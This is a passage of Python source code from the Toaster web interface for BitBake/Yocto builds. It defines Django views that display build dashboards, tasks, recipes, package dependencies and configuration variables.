date_from.strftime(\"%Y-%m-%d\")\n date_to_str = (date_to+timedelta(days=1)).strftime(\"%Y-%m-%d\")\n filter_string=filter_list[0]+'!'+filter_list[1]+':'+date_from_str+'!'+date_to_str\n daterange_selected = re.sub('__.*','', date_id)\n return filter_string,daterange_selected\n\ndef _add_daterange_context(queryset_all, request, daterange_list):\n # calculate the exact begining of local today and yesterday\n today_begin = timezone.localtime(timezone.now())\n yesterday_begin = today_begin - timedelta(days=1)\n # add daterange persistent\n context_date = {}\n context_date['last_date_from'] = request.GET.get('last_date_from',timezone.localtime(timezone.now()).strftime(\"%d/%m/%Y\"))\n context_date['last_date_to' ] = request.GET.get('last_date_to' ,context_date['last_date_from'])\n # calculate the date ranges, avoid second sort for 'created'\n # fetch the respective max range from the database\n context_date['daterange_filter']=''\n for key in daterange_list:\n queryset_key = queryset_all.order_by(key)\n try:\n context_date['dateMin_'+key]=timezone.localtime(getattr(queryset_key.first(),key)).strftime(\"%d/%m/%Y\")\n except AttributeError:\n context_date['dateMin_'+key]=timezone.localtime(timezone.now())\n try:\n context_date['dateMax_'+key]=timezone.localtime(getattr(queryset_key.last(),key)).strftime(\"%d/%m/%Y\")\n except AttributeError:\n context_date['dateMax_'+key]=timezone.localtime(timezone.now())\n return context_date,today_begin,yesterday_begin\n\n\n##\n# build dashboard for a single build, coming in as argument\n# Each build may contain multiple targets and each target\n# may generate multiple image files. display them all.\n#\ndef builddashboard( request, build_id ):\n template = \"builddashboard.html\"\n if Build.objects.filter( pk=build_id ).count( ) == 0 :\n return redirect( builds )\n build = Build.objects.get( pk = build_id );\n layerVersionId = Layer_Version.objects.filter( build = build_id );\n recipeCount = Recipe.objects.filter( layer_version__id__in = layerVersionId ).count( );\n tgts = Target.objects.filter( build_id = build_id ).order_by( 'target' );\n\n # set up custom target list with computed package and image data\n targets = []\n ntargets = 0\n\n # True if at least one target for this build has an SDK artifact\n # or image file\n has_artifacts = False\n\n for t in tgts:\n elem = {}\n elem['target'] = t\n\n target_has_images = False\n image_files = []\n\n npkg = 0\n pkgsz = 0\n package = None\n # Chunk the query to avoid \"too many SQL variables\" error\n package_set = t.target_installed_package_set.all()\n package_set_len = len(package_set)\n for ps_start in range(0,package_set_len,500):\n ps_stop = min(ps_start+500,package_set_len)\n for package in Package.objects.filter(id__in = [x.package_id for x in package_set[ps_start:ps_stop]]):\n pkgsz = pkgsz + package.size\n if package.installed_name:\n npkg = npkg + 1\n elem['npkg'] = npkg\n elem['pkgsz'] = pkgsz\n ti = Target_Image_File.objects.filter(target_id = t.id)\n for i in ti:\n ndx = i.file_name.rfind('/')\n if ndx < 0:\n ndx = 0;\n f = i.file_name[ndx + 1:]\n image_files.append({\n 'id': i.id,\n 'path': f,\n 'size': i.file_size,\n 'suffix': i.suffix\n })\n if len(image_files) > 0:\n target_has_images = True\n elem['targetHasImages'] = target_has_images\n\n elem['imageFiles'] = image_files\n elem['target_kernel_artifacts'] = t.targetkernelfile_set.all()\n\n target_sdk_files = t.targetsdkfile_set.all()\n target_sdk_artifacts_count = target_sdk_files.count()\n elem['target_sdk_artifacts_count'] = target_sdk_artifacts_count\n elem['target_sdk_artifacts'] = target_sdk_files\n\n if target_has_images or target_sdk_artifacts_count > 0:\n has_artifacts = True\n\n targets.append(elem)\n\n ##\n # how many packages in this build - ignore anonymous ones\n #\n\n packageCount = 0\n packages = Package.objects.filter( build_id = build_id )\n for p in packages:\n if ( p.installed_name ):\n packageCount = packageCount + 1\n\n logmessages = list(LogMessage.objects.filter( build = build_id ))\n\n context = {\n 'build' : build,\n 'project' : build.project,\n 'hasArtifacts' : has_artifacts,\n 'ntargets' : ntargets,\n 'targets' : targets,\n 'recipecount' : recipeCount,\n 'packagecount' : packageCount,\n 'logmessages' : logmessages,\n }\n return toaster_render( request, template, context )\n\n\n\ndef generateCoveredList2( revlist = None ):\n if not revlist:\n revlist = []\n covered_list = [ x for x in revlist if x.outcome == Task.OUTCOME_COVERED ]\n while len(covered_list):\n revlist = [ x for x in revlist if x.outcome != Task.OUTCOME_COVERED ]\n if len(revlist) > 0:\n return revlist\n\n newlist = _find_task_revdep_list(covered_list)\n\n revlist = list(set(revlist + newlist))\n covered_list = [ x for x in revlist if x.outcome == Task.OUTCOME_COVERED ]\n return revlist\n\ndef task( request, build_id, task_id ):\n template = \"task.html\"\n tasks_list = Task.objects.filter( pk=task_id )\n if tasks_list.count( ) == 0:\n return redirect( builds )\n task_object = tasks_list[ 0 ];\n dependencies = sorted(\n _find_task_dep( task_object ),\n key=lambda t:'%s_%s %s'%(t.recipe.name, t.recipe.version, t.task_name))\n reverse_dependencies = sorted(\n _find_task_revdep( task_object ),\n key=lambda t:'%s_%s %s'%( t.recipe.name, t.recipe.version, t.task_name ))\n coveredBy = '';\n if ( task_object.outcome == Task.OUTCOME_COVERED ):\n# _list = generateCoveredList( task )\n coveredBy = sorted(generateCoveredList2( _find_task_revdep( task_object ) ), key = lambda x: x.recipe.name)\n log_head = ''\n log_body = ''\n if task_object.outcome == task_object.OUTCOME_FAILED:\n pass\n\n uri_list= [ ]\n variables = Variable.objects.filter(build=build_id)\n v=variables.filter(variable_name='SSTATE_DIR')\n if v.count() > 0:\n uri_list.append(v[0].variable_value)\n v=variables.filter(variable_name='SSTATE_MIRRORS')\n if (v.count() > 0):\n for mirror in v[0].variable_value.split('\\\\n'):\n s=re.sub('.* ','',mirror.strip(' \\t\\n\\r'))\n if len(s):\n uri_list.append(s)\n\n context = {\n 'build' : Build.objects.filter( pk = build_id )[ 0 ],\n 'object' : task_object,\n 'task' : task_object,\n 'covered_by' : coveredBy,\n 'deps' : dependencies,\n 'rdeps' : reverse_dependencies,\n 'log_head' : log_head,\n 'log_body' : log_body,\n 'showing_matches' : False,\n 'uri_list' : uri_list,\n 'task_in_tasks_table_pg': int(task_object.order / 25) + 1\n }\n if request.GET.get( 'show_matches', \"\" ):\n context[ 'showing_matches' ] = True\n context[ 'matching_tasks' ] = Task.objects.filter(\n sstate_checksum=task_object.sstate_checksum ).filter(\n build__completed_on__lt=task_object.build.completed_on).exclude(\n order__isnull=True).exclude(outcome=Task.OUTCOME_NA).order_by('-build__completed_on')\n\n return toaster_render( request, template, context )\n\ndef recipe(request, build_id, recipe_id, active_tab=\"1\"):\n template = \"recipe.html\"\n if Recipe.objects.filter(pk=recipe_id).count() == 0 :\n return redirect(builds)\n\n recipe_object = Recipe.objects.get(pk=recipe_id)\n layer_version = Layer_Version.objects.get(pk=recipe_object.layer_version_id)\n layer = Layer.objects.get(pk=layer_version.layer_id)\n tasks_list = Task.objects.filter(recipe_id = recipe_id, build_id = build_id).exclude(order__isnull=True).exclude(task_name__endswith='_setscene').exclude(outcome=Task.OUTCOME_NA)\n package_count = Package.objects.filter(recipe_id = recipe_id).filter(build_id = build_id).filter(size__gte=0).count()\n\n if active_tab != '1' and active_tab != '3' and active_tab != '4' :\n active_tab = '1'\n tab_states = {'1': '', '3': '', '4': ''}\n tab_states[active_tab] = 'active'\n\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'object' : recipe_object,\n 'layer_version' : layer_version,\n 'layer' : layer,\n 'tasks' : tasks_list,\n 'package_count' : package_count,\n 'tab_states' : tab_states,\n }\n return toaster_render(request, template, context)\n\ndef recipe_packages(request, build_id, recipe_id):\n template = \"recipe_packages.html\"\n if Recipe.objects.filter(pk=recipe_id).count() == 0 :\n return redirect(builds)\n\n (pagesize, orderby) = _get_parameters_values(request, 10, 'name:+')\n mandatory_parameters = { 'count': pagesize, 'page' : 1, 'orderby': orderby }\n retval = _verify_parameters( request.GET, mandatory_parameters )\n if retval:\n return _redirect_parameters( 'recipe_packages', request.GET, mandatory_parameters, build_id = build_id, recipe_id = recipe_id)\n (filter_string, search_term, ordering_string) = _search_tuple(request, Package)\n\n recipe_object = Recipe.objects.get(pk=recipe_id)\n queryset = Package.objects.filter(recipe_id = recipe_id).filter(build_id = build_id).filter(size__gte=0)\n package_count = queryset.count()\n queryset = _get_queryset(Package, queryset, filter_string, search_term, ordering_string, 'name')\n\n packages = _build_page_range(Paginator(queryset, pagesize),request.GET.get('page', 1))\n\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'recipe' : recipe_object,\n 'objects' : packages,\n 'object_count' : package_count,\n 'tablecols':[\n {\n 'name':'Package',\n 'orderfield': _get_toggle_order(request,\"name\"),\n 'ordericon': _get_toggle_order_icon(request,\"name\"),\n 'orderkey': \"name\",\n },\n {\n 'name':'Version',\n },\n {\n 'name':'Size',\n 'orderfield': _get_toggle_order(request,\"size\", True),\n 'ordericon': _get_toggle_order_icon(request,\"size\"),\n 'orderkey': 'size',\n 'dclass': 'sizecol span2',\n },\n ]\n }\n response = toaster_render(request, template, context)\n _set_parameters_values(pagesize, orderby, request)\n return response\n\nfrom django.http import HttpResponse\n@log_view_mixin\ndef xhr_dirinfo(request, build_id, target_id):\n top = request.GET.get('start', '/')\n return HttpResponse(_get_dir_entries(build_id, target_id, top), content_type = \"application/json\")\n\nfrom django.utils.functional import Promise\nfrom django.utils.encoding import force_str\nclass LazyEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, Promise):\n return force_str(obj)\n return super(LazyEncoder, self).default(obj)\n\nfrom toastergui.templatetags.projecttags import filtered_filesizeformat\nimport os\ndef _get_dir_entries(build_id, target_id, start):\n node_str = {\n Target_File.ITYPE_REGULAR : '-',\n Target_File.ITYPE_DIRECTORY : 'd',\n Target_File.ITYPE_SYMLINK : 'l',\n Target_File.ITYPE_SOCKET : 's',\n Target_File.ITYPE_FIFO : 'p',\n Target_File.ITYPE_CHARACTER : 'c',\n Target_File.ITYPE_BLOCK : 'b',\n }\n response = []\n objects = Target_File.objects.filter(target__exact=target_id, directory__path=start)\n target_packages = Target_Installed_Package.objects.filter(target__exact=target_id).values_list('package_id', flat=True)\n for o in objects:\n # exclude root inode '/'\n if o.path == '/':\n continue\n try:\n entry = {}\n entry['parent'] = start\n entry['name'] = os.path.basename(o.path)\n entry['fullpath'] = o.path\n\n # set defaults, not all dentries have packages\n entry['installed_package'] = None\n entry['package_id'] = None\n entry['package'] = None\n entry['link_to'] = None\n if o.inodetype == Target_File.ITYPE_DIRECTORY:\n entry['isdir'] = 1\n # is there content in directory\n entry['childcount'] = Target_File.objects.filter(target__exact=target_id, directory__path=o.path).all().count()\n else:\n entry['isdir'] = 0\n\n # resolve the file to get the package from the resolved file\n resolved_id = o.sym_target_id\n resolved_path = o.path\n if target_packages.count():\n while resolved_id != \"\" and resolved_id is not None:\n tf = Target_File.objects.get(pk=resolved_id)\n resolved_path = tf.path\n resolved_id = tf.sym_target_id\n\n thisfile=Package_File.objects.all().filter(path__exact=resolved_path, package_id__in=target_packages)\n if thisfile.count():\n p = Package.objects.get(pk=thisfile[0].package_id)\n entry['installed_package'] = p.installed_name\n entry['package_id'] = str(p.id)\n entry['package'] = p.name\n # don't use resolved path from above, show immediate link-to\n if o.sym_target_id != \"\" and o.sym_target_id is not None:\n entry['link_to'] = Target_File.objects.get(pk=o.sym_target_id).path\n entry['size'] = filtered_filesizeformat(o.size)\n if entry['link_to'] is not None:\n entry['permission'] = node_str[o.inodetype] + o.permission\n else:\n entry['permission'] = node_str[o.inodetype] + o.permission\n entry['owner'] = o.owner\n entry['group'] = o.group\n response.append(entry)\n\n except Exception as e:\n print(\"Exception \", e)\n traceback.print_exc()\n\n # sort by directories first, then by name\n rsorted = sorted(response, key=lambda entry : entry['name'])\n rsorted = sorted(rsorted, key=lambda entry : entry['isdir'], reverse=True)\n return json.dumps(rsorted, cls=LazyEncoder).replace('', '<\\\\/')\n\ndef dirinfo(request, build_id, target_id, file_path=None):\n template = \"dirinfo.html\"\n objects = _get_dir_entries(build_id, target_id, '/')\n packages_sum = Package.objects.filter(id__in=Target_Installed_Package.objects.filter(target_id=target_id).values('package_id')).aggregate(Sum('installed_size'))\n dir_list = None\n if file_path is not None:\n \"\"\"\n Link from the included package detail file list page and is\n requesting opening the dir info to a specific file path.\n Provide the list of directories to expand and the full path to\n highlight in the page.\n \"\"\"\n # Aassume target's path separator matches host's, that is, os.sep\n sep = os.sep\n dir_list = []\n head = file_path\n while head != sep:\n (head, tail) = os.path.split(head)\n if head != sep:\n dir_list.insert(0, head)\n\n build = Build.objects.get(pk=build_id)\n\n context = { 'build': build,\n 'project': build.project,\n 'target': Target.objects.get(pk=target_id),\n 'packages_sum': packages_sum['installed_size__sum'],\n 'objects': objects,\n 'dir_list': dir_list,\n 'file_path': file_path,\n }\n return toaster_render(request, template, context)\n\ndef _find_task_dep(task_object):\n tdeps = Task_Dependency.objects.filter(task=task_object).filter(depends_on__order__gt=0)\n tdeps = tdeps.exclude(depends_on__outcome=Task.OUTCOME_NA).select_related(\"depends_on\")\n return [x.depends_on for x in tdeps]\n\ndef _find_task_revdep(task_object):\n tdeps = Task_Dependency.objects.filter(depends_on=task_object).filter(task__order__gt=0)\n tdeps = tdeps.exclude(task__outcome = Task.OUTCOME_NA).select_related(\"task\", \"task__recipe\", \"task__build\")\n\n # exclude self-dependencies to prevent infinite dependency loop\n # in generateCoveredList2()\n tdeps = tdeps.exclude(task=task_object)\n\n return [tdep.task for tdep in tdeps]\n\ndef _find_task_revdep_list(tasklist):\n tdeps = Task_Dependency.objects.filter(depends_on__in=tasklist).filter(task__order__gt=0)\n tdeps = tdeps.exclude(task__outcome=Task.OUTCOME_NA).select_related(\"task\", \"task__recipe\", \"task__build\")\n\n # exclude self-dependencies to prevent infinite dependency loop\n # in generateCoveredList2()\n tdeps = tdeps.exclude(task=F('depends_on'))\n\n return [tdep.task for tdep in tdeps]\n\ndef _find_task_provider(task_object):\n task_revdeps = _find_task_revdep(task_object)\n for tr in task_revdeps:\n if tr.outcome != Task.OUTCOME_COVERED:\n return tr\n for tr in task_revdeps:\n trc = _find_task_provider(tr)\n if trc is not None:\n return trc\n return None\n\ndef configuration(request, build_id):\n template = 'configuration.html'\n\n var_names = ('BB_VERSION', 'BUILD_SYS', 'NATIVELSBSTRING', 'TARGET_SYS',\n 'MACHINE', 'DISTRO', 'DISTRO_VERSION', 'TUNE_FEATURES', 'TARGET_FPU')\n context = dict(Variable.objects.filter(build=build_id, variable_name__in=var_names)\\\n .values_list('variable_name', 'variable_value'))\n build = Build.objects.get(pk=build_id)\n context.update({'objectname': 'configuration',\n 'object_search_display':'variables',\n 'filter_search_display':'variables',\n 'build': build,\n 'project': build.project,\n 'targets': Target.objects.filter(build=build_id)})\n return toaster_render(request, template, context)\n\n\ndef configvars(request, build_id):\n template = 'configvars.html'\n (pagesize, orderby) = _get_parameters_values(request, 100, 'variable_name:+')\n mandatory_parameters = { 'count': pagesize, 'page' : 1, 'orderby' : orderby, 'filter' : 'description__regex:.+' }\n retval = _verify_parameters( request.GET, mandatory_parameters )\n (filter_string, search_term, ordering_string) = _search_tuple(request, Variable)\n if retval:\n # if new search, clear the default filter\n if search_term and len(search_term):\n mandatory_parameters['filter']=''\n return _redirect_parameters( 'configvars', request.GET, mandatory_parameters, build_id = build_id)\n\n queryset = Variable.objects.filter(build=build_id).exclude(variable_name__istartswith='B_').exclude(variable_name__istartswith='do_')\n queryset_with_search = _get_queryset(Variable, queryset, None, search_term, ordering_string, 'variable_name').exclude(variable_value='',vhistory__file_name__isnull=True)\n queryset = _get_queryset(Variable, queryset, filter_string, search_term, ordering_string, 'variable_name')\n # remove records where the value is empty AND there are no history files\n queryset = queryset.exclude(variable_value='',vhistory__file_name__isnull=True)\n\n variables = _build_page_range(Paginator(queryset, pagesize), request.GET.get('page', 1))\n\n # show all matching files (not just the last one)\n file_filter= search_term + \":\"\n if filter_string.find('/conf/') > 0:\n file_filter += 'conf/(local|bblayers).conf'\n if filter_string.find('conf/machine/') > 0:\n file_filter += 'conf/machine/'\n if filter_string.find('conf/distro/') > 0:\n file_filter += 'conf/distro/'\n if filter_string.find('/bitbake.conf') > 0:\n file_filter += '/bitbake.conf'\n build_dir=re.sub(\"/tmp/log/.*\",\"\",Build.objects.get(pk=build_id).cooker_log_path)\n\n build = Build.objects.get(pk=build_id)\n\n context = {\n 'objectname': 'configvars',\n 'object_search_display':'BitBake variables',\n 'filter_search_display':'variables',\n 'file_filter': file_filter,\n 'build': build,\n 'project': build.project,\n 'objects' : variables,\n 'total_count':queryset_with_search.count(),\n 'default_orderby' : 'variable_name:+',\n 'search_term':search_term,\n # Specifies the display of columns for the table, appearance in \"Edit columns\" box, toggling default show/hide, and specifying filters for columns\n 'tablecols' : [\n {'name': 'Variable',\n 'qhelp': \"BitBake is a generic task executor that considers a list of tasks with dependencies and handles metadata that consists of variables in a certain format that get passed to the tasks\",\n 'orderfield': _get_toggle_order(request, \"variable_name\"),\n 'ordericon':_get_toggle_order_icon(request, \"variable_name\"),\n },\n {'name': 'Value',\n 'qhelp': \"The value assigned to the variable\",\n },\n {'name': 'Set in file',\n 'qhelp': \"The last configuration file that touched the variable value\",\n 'clclass': 'file', 'hidden' : 0,\n 'orderkey' : 'vhistory__file_name',\n 'filter' : {\n 'class' : 'vhistory__file_name',\n 'label': 'Show:',\n 'options' : [\n ('Local configuration variables', 'vhistory__file_name__contains:'+build_dir+'/conf/',queryset_with_search.filter(vhistory__file_name__contains=build_dir+'/conf/').count(), 'Select this filter to see variables set by the local.conf and bblayers.conf configuration files inside the /build/conf/ directory'),\n ('Machine configuration variables', 'vhistory__file_name__contains:conf/machine/',queryset_with_search.filter(vhistory__file_name__contains='conf/machine').count(), 'Select this filter to see variables set by the configuration file(s) inside your layers /conf/machine/ directory'),\n ('Distro configuration variables', 'vhistory__file_name__contains:conf/distro/',queryset_with_search.filter(vhistory__file_name__contains='conf/distro').count(), 'Select this filter to see variables set by the configuration file(s) inside your layers /conf/distro/ directory'),\n ('Layer configuration variables', 'vhistory__file_name__contains:conf/layer.conf',queryset_with_search.filter(vhistory__file_name__contains='conf/layer.conf').count(), 'Select this filter to see variables set by the layer.conf configuration file inside your layers'),\n ('bitbake.conf variables', 'vhistory__file_name__contains:/bitbake.conf',queryset_with_search.filter(vhistory__file_name__contains='/bitbake.conf').count(), 'Select this filter to see variables set by the bitbake.conf configuration file'),\n ]\n },\n },\n {'name': 'Description',\n 'qhelp': \"A brief explanation of the variable\",\n 'clclass': 'description', 'hidden' : 0,\n 'dclass': \"span4\",\n 'filter' : {\n 'class' : 'description',\n 'label': 'Show:',\n 'options' : [\n ('Variables with description', 'description__regex:.+', queryset_with_search.filter(description__regex='.+').count(), 'We provide descriptions for the most common BitBake variables. The list of descriptions lives in meta/conf/documentation.conf'),\n ]\n },\n },\n ],\n }\n\n response = toaster_render(request, template, context)\n _set_parameters_values(pagesize, orderby, request)\n return response\n\ndef bfile(request, build_id, package_id):\n template = 'bfile.html'\n files = Package_File.objects.filter(package = package_id)\n build = Build.objects.get(pk=build_id)\n context = {\n 'build': build,\n 'project': build.project,\n 'objects' : files\n }\n return toaster_render(request, template, context)\n\n\n# A set of dependency types valid for both included and built package views\nOTHER_DEPENDS_BASE = [\n Package_Dependency.TYPE_RSUGGESTS,\n Package_Dependency.TYPE_RPROVIDES,\n Package_Dependency.TYPE_RREPLACES,\n Package_Dependency.TYPE_RCONFLICTS,\n ]\n\n# value for invalid row id\nINVALID_KEY = -1\n\n\"\"\"\nGiven a package id, target_id retrieves two sets of this image and package's\ndependencies. The return value is a dictionary consisting of two other\nlists: a list of 'runtime' dependencies, that is, having RDEPENDS\nvalues in source package's recipe, and a list of other dependencies, that is\nthe list of possible recipe variables as found in OTHER_DEPENDS_BASE plus\nthe RRECOMMENDS or TRECOMMENDS value.\nThe lists are built in the sort order specified for the package runtime\ndependency views.\n\"\"\"\ndef _get_package_dependencies(package_id, target_id = INVALID_KEY):\n runtime_deps = []\n other_deps = []\n other_depends_types = OTHER_DEPENDS_BASE\n\n if target_id != INVALID_KEY :\n rdepends_type = Package_Dependency.TYPE_TRDEPENDS\n other_depends_types += [Package_Dependency.TYPE_TRECOMMENDS]\n else :\n rdepends_type = Package_Dependency.TYPE_RDEPENDS\n other_depends_types += [Package_Dependency.TYPE_RRECOMMENDS]\n\n package = Package.objects.get(pk=package_id)\n if target_id != INVALID_KEY :\n alldeps = package.package_dependencies_source.filter(target_id__exact = target_id)\n else :\n alldeps = package.package_dependencies_source.all()\n for idep in alldeps:\n dep_package = Package.objects.get(pk=idep.depends_on_id)\n dep_entry = Package_Dependency.DEPENDS_DICT[idep.dep_type]\n if dep_package.version == '' :\n version = ''\n else :\n version = dep_package.version + \"-\" + dep_package.revision\n installed = False\n if target_id != INVALID_KEY :\n if Target_Installed_Package.objects.filter(target_id__exact = target_id, package_id__exact = dep_package.id).count() > 0:\n installed = True\n dep = {\n 'name' : dep_package.name,\n 'version' : version,\n 'size' : dep_package.size,\n 'dep_type' : idep.dep_type,\n 'dep_type_display' : dep_entry[0].capitalize(),\n 'dep_type_help' : dep_entry[1] % (dep_package.name, package.name),\n 'depends_on_id' : dep_package.id,\n 'installed' : installed,\n }\n\n if target_id != INVALID_KEY:\n dep['alias'] = _get_package_alias(dep_package)\n\n if idep.dep_type == rdepends_type :\n runtime_deps.append(dep)\n elif idep.dep_type in other_depends_types :\n other_deps.append(dep)\n\n rdep_sorted = sorted(runtime_deps, key=lambda k: k['name'])\n odep_sorted = sorted(\n sorted(other_deps, key=lambda k: k['name']),\n key=lambda k: k['dep_type'])\n retvalues = {'runtime_deps' : rdep_sorted, 'other_deps' : odep_sorted}\n return retvalues\n\n# Return the count of packages dependent on package for this target_id image\ndef _get_package_reverse_dep_count(package, target_id):\n return package.package_dependencies_target.filter(target_id__exact=target_id, dep_type__exact = Package_Dependency.TYPE_TRDEPENDS).count()\n\n# Return the count of the packages that this package_id is dependent on.\n# Use one of the two RDEPENDS types, either TRDEPENDS if the package was\n# installed, or else RDEPENDS if only built.\ndef _get_package_dependency_count(package, target_id, is_installed):\n if is_installed :\n return package.package_dependencies_source.filter(target_id__exact = target_id,\n dep_type__exact = Package_Dependency.TYPE_TRDEPENDS).count()\n else :\n return package.package_dependencies_source.filter(dep_type__exact = Package_Dependency.TYPE_RDEPENDS).count()\n\ndef _get_package_alias(package):\n alias = package.installed_name\n if alias is not None and alias != '' and alias != package.name:\n return alias\n else:\n return ''\n\ndef _get_fullpackagespec(package):\n r = package.name\n version_good = package.version is not None and package.version != ''\n revision_good = package.revision is not None and package.revision != ''\n if version_good or revision_good:\n r += '_'\n if version_good:\n r += package.version\n if revision_good:\n r += '-'\n if revision_good:\n r += package.revision\n return r\n\ndef package_built_detail(request, build_id, package_id):\n template = \"package_built_detail.html\"\n if Build.objects.filter(pk=build_id).count() == 0 :\n return redirect(builds)\n\n # follow convention for pagination w/ search although not used for this view\n queryset = Package_File.objects.filter(package_id__exact=package_id)\n (pagesize, orderby) = _get_parameters_values(request, 25, 'path:+')\n mandatory_parameters = { 'count': pagesize, 'page' : 1, 'orderby' : orderby }\n retval = _verify_parameters( request.GET, mandatory_parameters )\n if retval:\n return _redirect_parameters( 'package_built_detail', request.GET, mandatory_parameters, build_id = build_id, package_id = package_id)\n\n (filter_string, search_term, ordering_string) = _search_tuple(request, Package_File)\n paths = _get_queryset(Package_File, queryset, filter_string, search_term, ordering_string, 'path')\n\n package = Package.objects.get(pk=package_id)\n package.fullpackagespec = _get_fullpackagespec(package)\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'package' : package,\n 'dependency_count' : _get_package_dependency_count(package, -1, False),\n 'objects' : paths,\n 'tablecols':[\n {\n 'name':'File',\n 'orderfield': _get_toggle_order(request, \"path\"),\n 'ordericon':_get_toggle_order_icon(request, \"path\"),\n },\n {\n 'name':'Size',\n 'orderfield': _get_toggle_order(request, \"size\", True),\n 'ordericon':_get_toggle_order_icon(request, \"size\"),\n 'dclass': 'sizecol span2',\n },\n ]\n }\n if paths.all().count() < 2:\n context['disable_sort'] = True;\n\n response = toaster_render(request, template, context)\n _set_parameters_values(pagesize, orderby, request)\n return response\n\ndef package_built_dependencies(request, build_id, package_id):\n template = \"package_built_dependencies.html\"\n if Build.objects.filter(pk=build_id).count() == 0 :\n return redirect(builds)\n\n package = Package.objects.get(pk=package_id)\n package.fullpackagespec = _get_fullpackagespec(package)\n dependencies = _get_package_dependencies(package_id)\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'package' : package,\n 'runtime_deps' : dependencies['runtime_deps'],\n 'other_deps' : dependencies['other_deps'],\n 'dependency_count' : _get_package_dependency_count(package, -1, False)\n }\n return toaster_render(request, template, context)\n\n\ndef package_included_detail(request, build_id, target_id, package_id):\n template = \"package_included_detail.html\"\n if Build.objects.filter(pk=build_id).count() == 0 :\n return redirect(builds)\n\n # follow convention for pagination w/ search although not used for this view\n (pagesize, orderby) = _get_parameters_values(request, 25, 'path:+')\n mandatory_parameters = { 'count': pagesize, 'page' : 1, 'orderby' : orderby }\n retval = _verify_parameters( request.GET, mandatory_parameters )\n if retval:\n return _redirect_parameters( 'package_included_detail', request.GET, mandatory_parameters, build_id = build_id, target_id = target_id, package_id = package_id)\n (filter_string, search_term, ordering_string) = _search_tuple(request, Package_File)\n\n queryset = Package_File.objects.filter(package_id__exact=package_id)\n paths = _get_queryset(Package_File, queryset, filter_string, search_term, ordering_string, 'path')\n\n package = Package.objects.get(pk=package_id)\n package.fullpackagespec = _get_fullpackagespec(package)\n package.alias = _get_package_alias(package)\n target = Target.objects.get(pk=target_id)\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'target' : target,\n 'package' : package,\n 'reverse_count' : _get_package_reverse_dep_count(package, target_id),\n 'dependency_count' : _get_package_dependency_count(package, target_id, True),\n 'objects': paths,\n 'tablecols':[\n {\n 'name':'File',\n 'orderfield': _get_toggle_order(request, \"path\"),\n 'ordericon':_get_toggle_order_icon(request, \"path\"),\n },\n {\n 'name':'Size',\n 'orderfield': _get_toggle_order(request, \"size\", True),\n 'ordericon':_get_toggle_order_icon(request, \"size\"),\n 'dclass': 'sizecol span2',\n },\n ]\n }\n if paths.all().count() < 2:\n context['disable_sort'] = True\n response = toaster_render(request, template, context)\n _set_parameters_values(pagesize, orderby, request)\n return response\n\ndef package_included_dependencies(request, build_id, target_id, package_id):\n template = \"package_included_dependencies.html\"\n if Build.objects.filter(pk=build_id).count() == 0 :\n return redirect(builds)\n\n package = Package.objects.get(pk=package_id)\n package.fullpackagespec = _get_fullpackagespec(package)\n package.alias = _get_package_alias(package)\n target = Target.objects.get(pk=target_id)\n\n dependencies = _get_package_dependencies(package_id, target_id)\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'package' : package,\n 'target' : target,\n 'runtime_deps' : dependencies['runtime_deps'],\n 'other_deps' : dependencies['other_deps'],\n 'reverse_count' : _get_package_reverse_dep_count(package, target_id),\n 'dependency_count' : _get_package_dependency_count(package, target_id, True)\n }\n return toaster_render(request, template, context)\n\ndef package_included_reverse_dependencies(request, build_id, target_id, package_id):\n template = \"package_included_reverse_dependencies.html\"\n if Build.objects.filter(pk=build_id).count() == 0 :\n return redirect(builds)\n\n (pagesize, orderby) = _get_parameters_values(request, 25, 'package__name:+')\n mandatory_parameters = { 'count': pagesize, 'page' : 1, 'orderby': orderby }\n retval = _verify_parameters( request.GET, mandatory_parameters )\n if retval:\n return _redirect_parameters( 'package_included_reverse_dependencies', request.GET, mandatory_parameters, build_id = build_id, target_id = target_id, package_id = package_id)\n (filter_string, search_term, ordering_string) = _search_tuple(request, Package_File)\n\n queryset = Package_Dependency.objects.select_related('depends_on').filter(depends_on=package_id, target_id=target_id, dep_type=Package_Dependency.TYPE_TRDEPENDS)\n objects = _get_queryset(Package_Dependency, queryset, filter_string, search_term, ordering_string, 'package__name')\n\n package = Package.objects.get(pk=package_id)\n package.fullpackagespec = _get_fullpackagespec(package)\n package.alias = _get_package_alias(package)\n target = Target.objects.get(pk=target_id)\n for o in objects:\n if o.package.version != '':\n o.package.version += '-' + o.package.revision\n o.alias = _get_package_alias(o.package)\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'package' : package,\n 'target' : target,\n 'objects' : objects,\n 'reverse_count' : _get_package_reverse_dep_count(package, target_id),\n 'dependency_count' : _get_package_dependency_count(package, target_id, True),\n 'tablecols':[\n {\n 'name':'Package',\n 'orderfield': _get_toggle_order(request, \"package__name\"),\n 'ordericon': _get_toggle_order_icon(request, \"package__name\"),\n },\n {\n 'name':'Version',\n },\n {\n 'name':'Size',\n 'orderfield': _get_toggle_order(request, \"package__size\", True),\n 'ordericon': _get_toggle_order_icon(request, \"package__size\"),\n 'dclass': 'sizecol span2',\n },\n ]\n }\n if objects.all().count() < 2:\n context['disable_sort'] = True\n response = toaster_render(request, template, context)\n _set_parameters_values(pagesize, orderby, request)\n return response\n\ndef image_information_dir(request, build_id, target_id, packagefile_id):\n # stubbed for now\n return redirect(builds)\n # the context processor that supplies data used across all the pages\n\n# a context processor which runs on every request; this provides the\n# projects and non_cli_projects (i.e. projects created by the user)\n# variables referred to in templates, which used to determine the\n# visibility of UI elements like the \"New build\" button\ndef managedcontextprocessor(request):\n projects = Project.objects.all()\n ret = {\n \"projects\": projects,\n \"non_cli_projects\": projects.exclude(is_default=True),\n \"DEBUG\" : toastermain.settings.DEBUG,\n \"TOASTER_BRANCH\": toastermain.settings.TOASTER_BRANCH,\n \"TOASTER_REVISION\" : toastermain.settings.TOASTER_REVISION,\n }\n return ret\n\n# REST-based API calls to return build/building status to external Toaster\n# managers and aggregators via JSON\n\ndef _json_build_status(build_id,extend):\n build_stat = None\n try:\n build = Build.objects.get( pk = build_id )\n build_stat = {}\n build_stat['id'] = build.id\n build_stat['name'] = build.build_name\n build_stat['machine'] = build.machine\n build_stat['distro'] = build.distro\n build_stat['start'] = build.started_on\n # look up target name\n target= Target.objects.get( build = build )\n if target:\n if 